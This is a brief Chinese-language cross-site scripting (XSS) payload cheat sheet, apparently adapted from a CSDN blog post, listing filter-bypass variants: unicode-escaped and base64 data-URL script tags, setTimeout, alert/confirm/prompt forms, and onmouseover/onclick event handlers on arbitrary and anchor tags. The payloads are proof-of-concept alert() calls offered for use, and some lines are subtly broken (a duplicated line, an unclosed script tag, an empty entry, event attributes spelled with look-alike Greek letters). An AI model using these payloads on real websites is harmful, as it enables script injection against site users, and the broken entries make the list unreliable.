参考https://blog.csdn.net/qq_29277155/article/details/51320064
0x01.标签绕过
1 script篇
方法:
1.1 ascii标识符
<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
1.2…标签的src属性---------dataurl 协议
<script src=data:text/javascript,alert(88199)></script>
<script src=data:text/javascript,alert(88199)></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
base64-----------alert(1)
1.3.String.fromCharCode
1.4.setTimeout
## <script>setTimeout(alert(88199),0)</script>
1.5.普通方式
<script>alert(navigator.userAgent)<script>
<script>alert(88199)</script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>
<script>+alert(88199)</script>
<script>alert(/88199/)</script>
<script>alert(/88199/.source)</script>
0x02、a标签运用
1.事件
<anytag οnmοuseοver=alert(15)>M
<anytag οnclick=alert(16)>M
<a οnmοuseοver=alert(17)>M
<a οnclick=alert(18)>M